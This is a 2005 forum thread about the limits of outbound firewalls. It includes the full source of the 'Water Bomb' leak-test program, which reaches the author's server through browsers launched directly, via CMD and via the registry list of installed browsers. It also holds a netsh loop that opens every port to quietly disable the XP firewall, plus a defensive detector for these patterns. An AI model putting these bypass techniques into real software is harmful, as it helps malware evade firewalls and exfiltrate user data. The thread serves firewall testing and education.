
Author Topic: Firewalls, What you need to know...  (Read 14399 times)

PhilKC

Firewalls, What you need to know...
« on: December 02, 2005, 02:48 AM »
Right, first thing... Get a comfy chair, this is going to be a long post. It's also 6am and I've been working all night, so don't expect this to be perfect; I've probably left huge chunks out... BAH  :(...

First, a slight note: I've been asked by a lot of people why they need a firewall if they own a router with NAT. Well, this post, and the tool I supply with it, should explain it. But, as a quick explanation, NAT only prevents incoming connections, not outgoing. :)

Now, onto the main topic, firewalls...

I'm not going to be talking much about a firewall's ability to keep 'hackers' out (although the scare tactics used by some, which count port scans as 'Attacks', do annoy me), rather, the ability (or lack of it) of the firewall to stop a program connecting to the Internet. Why is this so important? Well, every time you download an exe, the first thing it could do is collect data about you (very easy) and then send it back to a server. That process would normally take less than a second, meaning you have no way to stop it unless you have a firewall...

So, let's expand on that and use it as an example:

0. You have downloaded a small application, thinking it was a game
1. Because it is relatively new/unknown, it is not picked up by your anti-virus
2. It brings up a game to distract you
3. It checks the Windows registry, browser logs, etc. for data
4/5. It creates a connection to its owner's server
4/5. It sends the data

Starting at 0, there is little you can do; if it's advertised as a game, it looks innocent.
Then, moving on to 1, we see the first major myth: most viruses are picked up by scanners. This is simply wrong; a scanner can only detect known threats and use basic heuristics, meaning that if someone were to make a virus today, not one anti-virus would detect it. It is essential that you keep your anti-virus updated, and that you are using a service which is updated in the first place.
2. A simple tactic: while you watch/play, it delivers its payload (3, 4 and 5)...
3. These checks won't be detected by any registry 'protection' software, as it does not write to the registry, only read. As mentioned, this step will take less than a second to complete if the code is optimised.
4. This is the first (and ONLY) chance your firewall gets to stop the application. If you do not have a firewall, or it fails to detect this stage, it will go straight to 5; otherwise you will be prompted as to the action you want to take. This is the main function I will be talking about.
5. If a connection is made, then, in literally no time, the data is sent, and whatever information the attacker wanted is theirs.

Now, at step 4, a lot of things happen, and there are a lot of ways those things can happen.

The overall idea of step 4 is to connect to, and send (as part of step 5) the requested information. The simplest way is for the application to try and connect directly and send the data directly too, but, of course, this is picked up by firewalls, and promptly rejected (assuming the user does not think the program needs to access the internet (which comes under 'rules', which I will discuss later)). However, there are several other ways for the program to get its 'message' sent. It could launch your favorite browser, and send the data like that (again, that will be covered in rules), or, it could launch any application on your computer and use that to send the data; all of this can be done silently too.

Now, rules: they are designed to make your life easier, but, I personally despise them. For example, you allow Firefox.exe access to the internet so it doesn't bug you every time you browse to a page. Well, what if the attacker programmed the application to run Firefox to send the data back? Then, you have a problem, one that, as far as I am aware, is not solvable... You could ask your firewall to ask every time Firefox connects to anywhere, for EVERY connection, but, no one has that much patience. How about allowing Firefox only until you close the browser? That's fine unless you have Firefox open when you run the application, which, if you had just downloaded it, you probably would have.

So, you see, ONE rule, for ONE application, especially a browser, is a huge security risk.

I have made a small application, using the Microsoft .NET 2 Framework ( http://www.microsoft...5&DisplayLang=en ), which is designed to test what I call 'Water Bombing', the act of making your firewall useless, to an extent, by using multiple methods. It's worth noting that this application is only 113 lines of code, and it does not affect your system in ANY way... If this were a real 'phone home' device, it would have functions to kill firewalls/anti-viruses etc... It will attempt to connect to a page on my server using normal methods for tests 1 and 2, but 3, 4 and 5 use browsers, to show the potential problem. Finally, 6, the 'Water Bomb' attack, uses a combination of all the above techniques to try to connect. If your firewall fails just one of those tests, you need to think seriously about the implications...

http://tanyvska.co.uk/Water%20Bomb (You only need the exe, the txt is the file the program tries to get to (check the source))

Please do post your results of the application, and the firewall you use.

On a side note, the XP SP2 firewall, yay or nay? NAY... Here is a simple code snippet in C++ which would render the XP firewall useless (but NOT disable it, so, no warning messages)

for (int i = 1; i < 65536; i++) {   // every port number, 1-65535
system(("netsh firewall add portopening ALL " + std::to_string(i) + " Windows").c_str());   // needs <string> and <cstdlib>; "..." + i on its own does not concatenate in C++
}

There, 3 lines of code, and your beloved XP SP2 firewall is rendered _totally_ useless...

Back on to 'Water Bombing', I asked mouser to test this program first, and, using traditional methods, it would have failed on 3, 4 and 5... However, mouser is a clever little devil, and used his BrowserTraySwitch application to defeat it from loading a real browser and I assume he had otherwise disabled IE. However, when the 'Water Bomb' test was run, it managed to get through, in his own words:
"first firewall leak test to beat me in fact"
This is not an issue to be taken lightly; the attacker does not need to know a huge amount of a language to make an application that uses these techniques.

As for a solution to 'Water Bombing', well, I don't see one... But, rest assured, the first firewall to protect a user against these tactics without huge amounts of configuration/hassle will be getting a nice little review. ;)

Relying on a firewall is dangerous, I hope this has made people see that.

Whew! All done. Thank you for your time, I hope I've given you something to think about, and, who knows, if mouser doesn't mind me spamming his forum every week or so, I might do something like this every now and then. :)

Oh, and here is the source to the 'Water Bomb' testing program...

#include "stdafx.h"

using namespace System;
using namespace System::Diagnostics;
using namespace System::Net::Sockets;

int main(array<System::String ^> ^args)
{
Console::Title = "Water Bomb [1.00] by PhilKC";
String^ mainMenu = "Water Bomb firewall tester, created by PhilKC [1.00]\n\nModes of operation:\n\n0: Info\n1: Try to access the internet directly using a TCPClient\n2: Try to access the internet directly using a WebClient\n3: Try to access the internet via the default browser\n4: Try to access the internet via IE\n5: Try to access the internet via IE being launched via CMD\n6: 'Water Bomb' test (Methods 1, 2 and a special browser call)\n\nA malicious program trying to 'Phone home'\nwould probably be best replicated using 6\n\nPlease select your choice: ";
String^ checkURL = "http://tanyvska.co.uk/Water%20Bomb/Data.txt";
Start:
Console::Clear();
Console::Write(mainMenu);
String^ method = Console::ReadLine();
if (method == "0") {
Console::Clear();
Console::WriteLine("This application is designed to dispel myths that firewalls or routers\ngive 'enough' protection...\n\nIf this application can produce the word 'FAILED', just once,\nthen consider this:\n\nNO information is sent from your PC (only requests for pages on my server),\nhowever, the data that is sent (As part of the requests), could have\nbeen passwords, credit cards, anything...\n\nIf you do find a firewall which protects you against the level 6 'Water Bomb'\nplease E-mail me: [email protected] as I'm always interested\nto know which firewalls do the best...");
Console::WriteLine("\nPress Enter to continue");
Console::ReadLine();
goto Start;
}
else if (method == "1") {
// Method 1: a raw TCP connect to port 80; no HTTP request is needed for the connection itself to leak
String^ method1Text;
TcpClient^ Client = gcnew TcpClient();
try {
Client->Connect("tanyvska.co.uk", 80);
method1Text = "Data transmitted and received (FAILED)";
}
catch (SocketException^ Ex) {
method1Text = "No data retrieved (PASS) Full error:\n" + Ex->ToString();
}
Console::WriteLine("\n" + method1Text + "\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
} else if (method == "2") {
// Method 2: an HTTP GET through WebClient (honours the system proxy settings)
Net::WebClient^ method2 = gcnew Net::WebClient();
method2->Headers->Add("user-agent", "Water Bomb (Method 1)");
String^ method2Text;
try {
method2Text = Text::Encoding::ASCII->GetString(method2->DownloadData(checkURL));
}
catch (Net::WebException^ Ex) {
method2Text = "No data retrieved (PASS) Full error:\n" + Ex->ToString();
}
Console::WriteLine("\n" + method2Text + "\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
} else if (method == "3") {
// Method 3: hand the URL to the shell (UseShellExecute is the default), so the default browser opens it
Process^ method3 = gcnew Process();
method3->StartInfo->FileName = checkURL;
Console::WriteLine("\nNow launching...");
method3->Start();
Console::WriteLine("\nIf a browser did not open with \"Data transmitted and received (FAILED)\" then consider it a PASS\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
} else if (method == "4") {
// Method 4: read IE's registered launch command from the registry and start it directly
Microsoft::Win32::RegistryKey^ rk = Microsoft::Win32::Registry::LocalMachine->OpenSubKey("SOFTWARE\\Clients\\StartMenuInternet\\iexplore.exe\\shell\\open\\command");
if (rk == nullptr) {
// OpenSubKey returns nullptr when the key is missing; the original code would have crashed here
Console::WriteLine("\nIE is not registered under StartMenuInternet, nothing launched (PASS)\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
}
Process^ method4 = gcnew Process();
method4->StartInfo->FileName = rk->GetValue("")->ToString();
method4->StartInfo->Arguments = checkURL;
method4->Start();
Console::WriteLine("\nIf a browser did not open with \"Data transmitted and received (FAILED)\" then consider it a PASS\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
} else if (method == "5") {
// Method 5: launch IE indirectly through CMD, so the firewall sees CMD as the parent process
Process^ method5 = gcnew Process();
method5->StartInfo->FileName = "CMD";
method5->StartInfo->Arguments = "/c \"\"%ProgramFiles%\\Internet Explorer\\iexplore.exe\" http://tanyvska.co.uk/Water Bomb/Data.txt\"";
method5->Start();
Console::WriteLine("\nIf a browser did not open with \"Data transmitted and received (FAILED)\" then consider it a PASS\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
} else if (method == "6") {
// Method 6 ('Water Bomb'): methods 1 and 2, then a launch of EVERY browser registered on the machine
TcpClient^ Client = gcnew TcpClient();
try {
Client->Connect("tanyvska.co.uk", 80);
Console::WriteLine("\nMethod 0: Data transmitted and received (FAILED)\n");
}
catch (SocketException^ Ex) {
Console::WriteLine("\nMethod 0: No data retrieved (PASS) Full error:\n" + Ex->ToString() + "\n");
}
Net::WebClient^ method61 = gcnew Net::WebClient();
method61->Headers->Add("user-agent", "Water Bomb (Method 1)");
try {
Console::WriteLine("Method 1: " + Text::Encoding::ASCII->GetString(method61->DownloadData(checkURL)) + "\n");
}
catch (Net::WebException^ Ex) {
Console::WriteLine("Method 1: No data retrieved (PASS) Full error:\n" + Ex->ToString() + "\n");
}
// Each subkey of StartMenuInternet is a browser that registered itself for the Start Menu 'Internet' slot.
// The original used an ArrayList declared as a value type (not valid C++/CLI); the subkey names can be used directly.
Microsoft::Win32::RegistryKey^ rk = Microsoft::Win32::Registry::LocalMachine->OpenSubKey("SOFTWARE\\Clients\\StartMenuInternet");
if (rk != nullptr) {
for each (String^ subkey in rk->GetSubKeyNames()) {
Microsoft::Win32::RegistryKey^ cmdKey = Microsoft::Win32::Registry::LocalMachine->OpenSubKey("SOFTWARE\\Clients\\StartMenuInternet\\" + subkey + "\\shell\\open\\command");
if (cmdKey == nullptr) continue;   // browser entry without a launch command
Object^ launchCommand = cmdKey->GetValue("");
if (launchCommand == nullptr) continue;   // default value not set
Process^ method62 = gcnew Process();
method62->StartInfo->FileName = launchCommand->ToString();
method62->StartInfo->Arguments = checkURL;
method62->Start();
}
}
Console::WriteLine("If browsers did not open with \"Data transmitted and received (FAILED)\" then consider it a PASS\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
}
else {
Console::WriteLine("\nInvalid selection" + "\n\nPress Enter to continue");
Console::ReadLine();
goto Start;
}
    return 0;
}

PhilKC
It's not a bug, it's an undocumented and unexplainable feature.
Stick it on your site:

Carol Haynes

Re: Firewalls, What you need to know...
« Reply #1 on: December 02, 2005, 03:58 AM »
Worrying ...

Rubbish follows - see below for correction ...
Sygate Firewall Pro (yes the dead one which I have reinstalled after more bad experiences with ZoneAlarm) managed to pass this test provided there wasn't an Internet Explorer based browser window open at the time.

Firefox as default browser caused no problem provided I didn't have Explorer or Maxthon (based on Explorer) windows open.

The other problem is that in order to get this to work it requires that you deny access to the internet when you run this app. Often when you run a new program you have to allow access to the internet to allow the program to function in the expected way - then the firewall is completely useless ...

Have you reported this security problem to MS ??? Strikes me the problem lies in a large measure at their door !!
« Last Edit: December 02, 2005, 04:08 AM by CarolHaynes »

PhilKC

Re: Firewalls, What you need to know...
« Reply #2 on: December 02, 2005, 04:02 AM »
Sygate Firewall Pro (yes the dead one which I have reinstalled after more bad experiences with ZoneAlarm) managed to pass this test provided there wasn't an Internet Explorer based browser window open at the time.

It passes the level 6 option? Impressive if so... As for talking to Microsoft? "Oh, hello Mr Brick Wall, how are you today..."

Carol Haynes

Re: Firewalls, What you need to know...
« Reply #3 on: December 02, 2005, 04:06 AM »
Correction - it doesn't work ... sorry, I had Firefox blocked before running WaterBomb.

I do think you should consider telling Microsoft - especially as you have openly published the code on this website - anyone could use your code to breach security and I strongly suggest you remove it.

If you don't want the hassle of contacting MS there are plenty of security watchers out there with direct MS contacts that would probably do it for you.

PhilKC

Re: Firewalls, What you need to know...
« Reply #4 on: December 02, 2005, 04:12 AM »
If you don't want the hassle of contacting MS there are plenty of security watchers out there with direct MS contacts that would probably do it for you.

I know of one or two people in Microsoft, but, the problem is, patches take months, years sometimes, to come out, hence I'm throwing it open to the community; maybe they can find a good fix...

mouser

Re: Firewalls, What you need to know...
« Reply #5 on: December 02, 2005, 04:32 AM »
awesome post.

as i was telling philKC on the irc chat, this is the first firewall leak tester that beats me, because it tries to run any non-default browsers it finds on the system, and while i have my default browser blocked, i have others which are allowed to connect through the internet.

the way to defeat this is (and now this is the first demonstration i've seen of why it's important) to have security that alerts you when one program tries to launch another, and allows you to set rules restricting that.  this might still not protect you if the app is already running, but it would save you from most situations.

check whether your firewall can block such launches of other programs.  agnitum has some support for this but i have it disabled - i guess it's time for me to rethink this..

I also want to comment on the idea of blocking outgoing connections:

I agree 100% with PhilKC that having good outgoing blocking in your firewall is critical - you really do need a firewall with good outgoing blocking rules, but as a layer of protection defense, and as a good way of keeping track of what programs are trying to send information where.

However, it's very important to realize that no matter how good your firewall is, if you actually launch an evil program on your computer, you have lost.

No matter how good your firewall is, launching a trojan on your pc allows it to do whatever it wants and breaching your firewall may be the least of your problems.  Other registry defense and sandboxing tools may help you a little, but basically such a program can do all sorts of damage i think that are going to be hard to stop if the program is truly determined.

To quote from War Games, the only way to win is not to play.

The most important thing is just to not run programs on your pc unless you really trust them.  One exception to this so far is the use of virtual machines, which is making it easier to safely run questionable stuff, since they offer much better sandboxing than other approaches.  In addition to VMWare, there are some free virtual machine tools which may work well enough for this purpose, and it's worth your while to get a virtual machine tool if you do a lot of software testing of questionable files.  See our review here: https://www.donation...alMachine/index.html
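The parent-process alerting mouser describes above, together with the two tricks from PhilKC's first post (a browser started with a URL on its command line, including the variant that goes through CMD, and the netsh port-opening loop), as detection logic over process-creation records. This is an added example written for this thread, not the Water Bomb code or any firewall product's rule set. The log format ("pid ppid image parent command-line"), the image names, the list of trusted launchers and the burst threshold of five are assumptions, and the log records are constructed.

```python
"""Flag process launches matching the firewall-bypass patterns discussed in the thread.

Added example (not from the original post). Two rules:
  1. browser-launch: a browser starts with a URL on its command line and the nearest
     non-shell ancestor is not an interactive launcher (explorer.exe), i.e. some other
     program used the user's browser to get a request out, possibly via cmd.exe.
  2. portopening-burst: one parent runs 'netsh firewall add portopening' many times,
     the XP SP2 port-opening loop from the first post.
"""
from collections import Counter
from dataclasses import dataclass
import re

BROWSER_IMAGES = {"iexplore.exe", "firefox.exe", "opera.exe"}   # assumed set
SHELL_IMAGES = {"cmd.exe"}                 # pass-through launchers to look past
TRUSTED_LAUNCHERS = {"explorer.exe"}       # a user clicking something
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
PORTOPEN_RE = re.compile(r"\bnetsh\s+firewall\s+add\s+portopening\b", re.IGNORECASE)
PORTOPEN_BURST = 5                         # assumed threshold per parent process


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # file name of the new process
    parent_image: str   # file name of the process that started it
    cmdline: str


def parse_log(text: str) -> list[ProcEvent]:
    """Parse the constructed record format: pid ppid image parent cmdline..."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, image, parent, cmd = line.split(maxsplit=4)
        events.append(ProcEvent(int(pid), int(ppid), image.lower(), parent.lower(), cmd))
    return events


def launching_program(event: ProcEvent, by_pid: dict[int, ProcEvent]) -> str:
    """Walk up through shells so 'game.exe -> cmd.exe -> iexplore.exe' resolves to game.exe."""
    current = event
    while current.parent_image in SHELL_IMAGES and current.ppid in by_pid:
        current = by_pid[current.ppid]
    return current.parent_image


def analyse(events: list[ProcEvent]) -> list[tuple[str, int, str]]:
    """Return (rule, pid, detail) for every suspicious record, in log order."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if e.image in BROWSER_IMAGES and URL_RE.search(e.cmdline):
            origin = launching_program(e, by_pid)
            if origin not in TRUSTED_LAUNCHERS:
                alerts.append(("browser-launch", e.pid,
                               f"{origin} started {e.image} with a URL: {e.cmdline}"))
    bursts = Counter(e.ppid for e in events if PORTOPEN_RE.search(e.cmdline))
    for ppid, count in bursts.items():
        if count >= PORTOPEN_BURST:
            parent = by_pid[ppid].image if ppid in by_pid else "unknown"
            alerts.append(("portopening-burst", ppid,
                           f"{parent} (pid {ppid}) ran {count} netsh portopening commands"))
    return alerts


# Constructed sample: a fake game started from Explorer, a user-started Firefox (benign),
# then the game phoning home via Firefox, via CMD+IE, and by punching holes in the firewall.
SAMPLE_LOG = """\
1200 800 explorer.exe userinit.exe C:\\Windows\\explorer.exe
1300 1200 game.exe explorer.exe C:\\Downloads\\game.exe
1400 1200 firefox.exe explorer.exe firefox.exe http://example.org/
1500 1300 firefox.exe game.exe firefox.exe http://example.test/Data.txt
1600 1300 cmd.exe game.exe cmd /c iexplore.exe http://example.test/Data.txt
1700 1600 iexplore.exe cmd.exe iexplore.exe http://example.test/Data.txt
""" + "".join(f"{1800 + i} 1300 netsh.exe game.exe netsh firewall add portopening ALL {i + 1} Windows\n"
              for i in range(6))

if __name__ == "__main__":
    for rule, pid, detail in analyse(parse_log(SAMPLE_LOG)):
        print(f"[{rule}] pid={pid}: {detail}")
```

On the sample the user-started Firefox (pid 1400) is left alone, while both browser launches that trace back to game.exe and the six netsh commands are reported. Looking past cmd.exe matters because method 5 of the test program deliberately puts CMD between the game and the browser; a rule that only looks at the immediate parent would still fire here (cmd.exe is not a trusted launcher) but would name the wrong culprit.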

mouser

Re: Firewalls, What you need to know...
« Reply #6 on: December 02, 2005, 04:34 AM »
i also wanted to post an extra thanks to philKC who found an amazing registry key: "SOFTWARE\\Clients\\StartMenuInternet\\" which apparently lists all installed browsers on your computer (works for me!), and will be useful to me for next version of browser tray switch.

ps. i don't know what this registry key does - one way to thwart this attack is to rename that key if it's not used for anything important.. the basic attack though could easily use other ways to locate common browser installations.

PhilKC

Re: Firewalls, What you need to know...
« Reply #7 on: December 02, 2005, 04:40 AM »
However, it's very important to realize that no matter how good your firewall is, if you actually launch an evil program on your computer, you have lost.

And with the increase in IM programs being used to transmit Virii through a trusted source (your friend), it's becoming very difficult to know what's evil...

one way to thwart this attack is to rename that key if its not used for anything important.. the basic attack though could easily use other ways to locate common browser installations.

As you said, "this" attack... If the source was closed, and this was in compacted C++, there would be no way to know the key... We (computer users) need a solution, and, in my eyes, it's the firewall makers who are lagging behind

Carol Haynes

Re: Firewalls, What you need to know...
« Reply #8 on: December 02, 2005, 05:11 AM »
As you said, "this" attack... If the source was closed, and this was in compacted C++, there would be no way to know the key... We (computer users) need a solution, and, in my eyes, it's the firewall makers who are lagging behind

They may be lagging behind - but the real issue is really at Microsoft's door - if WindowsXP had some semblance of security built in most of the third party security providers would be unnecessary. I guess MS are being philanthropic!

One solution to this problem is to run something like DiamondCS Process Guard all the time, and don't allow programmes (and I suppose especially browsers) to run automatically (just click OK each time it is an intentional launch). It wouldn't stop the problem if browser windows are already open but it would stop any browser being launched by another program without permission.

The biggest problem I can see is that we have to trust so many programs - many usefully check for updates, use webpages to provide help and support from within the application, use the Internet Explorer engine to display their pages (e.g. how many people are running Weather Watcher? That is basically Internet Explorer running all the time it is loaded).

nudone

Re: Firewalls, What you need to know...
« Reply #9 on: December 03, 2005, 10:24 AM »
great post PhilKC.

can't wait to read the next installment.

delwoode

Re: Firewalls, What you need to know...
« Reply #10 on: August 25, 2009, 08:13 AM »
@Mouser
quote "as i was telling philKC on the irc chat, this is the first firewall leak tester that beats me, because it tries to run any non-default browsers it finds on the system, and while i have my default browser blocked, i have others which are allowed to connect through the internet."

It runs non-default browsers; would it also find portable browsers on your hard drive?

mouser

Re: Firewalls, What you need to know...
« Reply #11 on: August 25, 2009, 08:20 AM »
would it also find portable browsers on your hard drive?
while it could be programmed to do so, this is very very unlikely.
you could make it impossible if you changed the exe filename of your browser.

40hz

Re: Firewalls, What you need to know...
« Reply #12 on: August 25, 2009, 09:27 AM »
The most important thing is just to not run programs on your pc unless you really trust them.  One exception to this so far is the use of virtual machines, which is making it easier to safely run questionable stuff, since they offer much better sandboxing than other approaches.  In addition to VMWare, there are some free virtual machine tools which may work well enough for this purpose, and it's worth your while to get a virtual machine tool if you do a lot of software testing of questionable files.

Another possible approach is to use any of the live Linux distros when browsing in places where you have cause for concern.


f0dder

Re: Firewalls, What you need to know...
« Reply #13 on: August 25, 2009, 09:52 AM »
Old thread :)

Run as a non-admin user (and if on Win7, crank UAC all the way to the top). Don't run random crap from unreputable sources. Presto: no need for a software firewall.

If you get bad stuff on your system, all bets are off, so you might as well not run a software firewall; there are too many possibilities of subverting them. And even if you have something that's not easily bypassed, you need high paranoia settings with a lot of bothersome popups in order to have any security at all - usually leading to auto-rules and yes-clicking and a false sense of security.

NAT'ing router (without any DMZ crap!) + limited user account + common sense = great success. Add some antivirus software and perhaps a non-IE browser (though IE8 is OK) to the mix if you want to, but an outbound software firewall is really just a lullaby.
- carpe noctem

mouser

Re: Firewalls, What you need to know...
« Reply #14 on: August 25, 2009, 11:07 AM »
Since it happens so rarely let me disagree with f0dder while I have the chance.

I think f0dder's main point is completely valid, which is:
If you run an evil program on your computer, even if you have a perfect software firewall, you have bigger problems on your hands and the evil program can do all sorts of bad things to your pc, and figure out ways to get around your firewall if it really wants to.

While that's true -- I think it skips over some important points.  Having multiple lines of defense is in practice extremely useful in protecting yourself against badly behaved software and rogue software.

A firewall can be a really useful first line of defense in alerting you when something unusual is going on and when a program is trying to connect out to the internet unexpectedly.

I can't count the number of times that my firewall has alerted me about some newly installed program or driver making a web connection that I would have otherwise had no idea about -- and which prompted me to investigate further what was going on.  In some cases it has been extremely useful in diagnosing slow startups, program hangs, etc.

In addition, I just like to know what's going on on my pc and I like the fact that a software firewall tells me when programs are trying to connect to the web. And I like having a second layer of defense in my remote control tools, etc.

Having said all that -- firewalls can also introduce all kinds of tricky-to-diagnose gremlins that occur when they get it into their heads to block stuff silently and cause programs to stop working with no sign of why.

Adding all that up, my approach is to use a software firewall and configure it to alert me about anything that I haven't specifically configured it to allow, and to not block anything I don't specifically say to block.  So for me, the firewall is mostly used as an "unexpected-connection alerter" -- much more than it is used to actually BLOCK stuff.  And I find it extremely valuable in this regard.

Stoic Joker

Re: Firewalls, What you need to know...
« Reply #15 on: August 25, 2009, 01:48 PM »
A firewall can be a really useful first line of defense in alerting you when something unusual is going on and when a program is trying to connect out to the internet unexpectedly.

I can't count the number of times that my firewall has alerted me about some newly installed program or driver making a web connection that I would have otherwise had no idea about -- and which prompted me to investigate further what was going on.  In some cases it has been extremely useful in diagnosing slow startups, program hangs, etc.

In addition, I just like to know what's going on on my pc and I like the fact that a software firewall tells me when programs are trying to connect to the web. And I like having a second layer of defense in my remote control tools, etc.
I usually use netstat /n for that - But field work tends to require you to use (work with only) what's there.

Having said all that -- firewalls can also introduce all kinds of tricky-to-diagnose gremlins that occur when they get it into their heads to block stuff silently and cause programs to stop working with no sign of why.
Now this I see constantly in the field.